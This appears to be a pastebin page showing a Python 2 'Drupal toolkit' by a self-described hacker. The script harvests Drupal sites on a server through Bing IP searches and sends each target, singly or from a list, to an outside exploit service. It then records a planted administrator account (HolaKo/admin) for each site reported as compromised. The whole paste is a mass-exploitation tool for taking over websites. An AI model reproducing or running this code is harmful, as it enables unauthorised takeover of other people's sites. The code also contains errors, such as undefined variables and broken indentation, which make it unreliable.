View difference between Paste ID: F7BEv08H and gSiLiXgp
SHOW: | | - or go back to the newest paste.
1
#!/usr/bin/python
2
 
3
import urllib2,urllib,re,sys,json
4
from urlparse import urlparse
5
 
6
logo = '''
7
 ____                          _____           _ _    _ _
8
|  _ \ _ __ ___  _ __   __ _  |_   _|__   ___ | | | _(_) |_
9
| | | | '__/ _ \| '_ \ / _` |   | |/ _ \ / _ \| | |/ / | __|
10
| |_| | | | (_) | | | | (_| |   | | (_) | (_) | |   <| | |_
11
|____/|_|  \___/|_| |_|\__,_|   |_|\___/ \___/|_|_|\_\_|\__|
12
          Coded by:- Cyb3r_h4ck3r (@itsmehulbhatt)
13
'''
14
 
15
menu ='''
16
\t{1} Drupal Bing Exploiter
17
\t{2} Get Drupal Websites
18
\t{3} Drupal Mass Exploiter
19
\t{4} About Me
20
'''
21
def about():
22
print ("\n\t**************************************************");
23
print ("\n\t*                Dr0n4 Drupal Toolkit            *");
24
print ("\n\t*            written By : Cyb3r_h4ck3r           *");
25
print ("\n\t*    Shouts out to : Team IHC & Indian hackers   *");
26
print ("\n\t*         Website :- www.team-ihc.in             *");
27
print ("\n\t**************************************************");
28
29
 
30
            #Definition Of Drupal Bing Expoliter
31
def drupal():
32
 
33
    '''Drupal Exploit Binger All Websites Of server '''
34
    ip  = raw_input('1- IP : ')
35
    page  = 1
36
    while page <= 50 :
37
     
38
      url   = "http://www.bing.com/search?q=ip%3A"+ip+"&go=Valider&qs=n&form=QBRE&pq=ip%3A"+ip+"&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first="+str(page)
39
      req   = urllib2.Request(url)
40
      opreq = urllib2.urlopen(req).read()
41
      findurl = re.findall('<div class="b_title"><h2><a href="(.*?)" h=',opreq)
42
      page += 1
43
     
44
      for url in findurl :
45
        try :
46
           
47
                        urlpa = urlparse(url)
48
                        site  = urlpa.netloc
49
 
50
                        print "[+] Testing At "+site
51
                        resp = urllib2.urlopen('http://vps-id.com/DRUPAL/?url='+site+'&submit=submit')
52
                        read=resp.read()
53
                        if "User : HolaKo" in read:
54
                           print "Exploit found =>"+site
55
 
56
                           print "user:HolaKo\npass:admin"
57
                           a = open('up.txt','a')
58
                           a.write(site+'\n')
59
                           a.write("user:"+user+"\npass:"+pwd+"\n")
60
                        else :
61
                           print "[-] Expl Not Found :( "
62
 
63
        except Exception as ex :
64
                       print ex
65
                       sys.exit(0)
66
 
67
 
68
            #Drupal Server ExtraCtor
69
def getdrupal():
70
    ip  = raw_input('2- Ip : ')
71
    page  = 1
72
    sites = list()
73
    while page <= 50 :
74
     
75
      url   = "http://www.bing.com/search?q=ip%3A"+ip+"+node&go=Valider&qs=ds&form=QBRE&first="+str(page)
76
      req   = urllib2.Request(url)
77
      opreq = urllib2.urlopen(req).read()
78
      findurl = re.findall('<div class="b_title"><h2><a href="(.*?)" h=',opreq)
79
      page += 1
80
     
81
      for url in findurl :
82
                             split = urlparse(url)
83
                             site   = split.netloc
84
                             if site not in sites :
85
                                      print site
86
                                      sites.append(site)
87
     
88
 
89
            #Drupal Mass List Exploiter
90
def drupallist():
91
        listop = raw_input("Enter The list Txt :")
92
        fileopen = open(listop,'r')
93
        content = fileopen.readlines()
94
        for i in content :
95
                url=i.strip()
96
                try :
97
                        openurl = urllib2.urlopen('http://vps-id.com/DRUPAL/?url='+url+'&submit=submit')
98
                        readcontent = openurl.read()
99
                        if  "Success" in readcontent :
100
                                print "[+]Success =>"+url
101
                                print "[-]username:HolaKo\n[-]password:admin"
102
                                save = open('drupal.txt','a')
103
                                save.write(url+"\n"+"[-]username:HolaKo\n[-]password:admin\n")
104
                               
105
                        else :
106
                                print i + "=> exploit not found "
107
                except Exception as ex :
108
                                print ex
109
 
110
def main():
111
 print logo
112
 print menu
113
 choose = raw_input("choose a number :")
114
 while True :
115
 
116
  if choose == "1":
117
    drupal()
118
  if choose == "2":
119
    getdrupal()
120
  if choose == "3":
121
    drupallist()
122
  if choose == "4":
123
    about()
124
  if choose == "11":
125
        print "#By"
126
        exit()
127
  con = raw_input('Continue [Y/n] -> ')
128
  if con[0].upper() == 'N' :
129
                                exit()
130
  if con[0].upper() == 'Y' :
131
                                main()
132
                               
133
 
134
 
135
if __name__ == '__main__':main()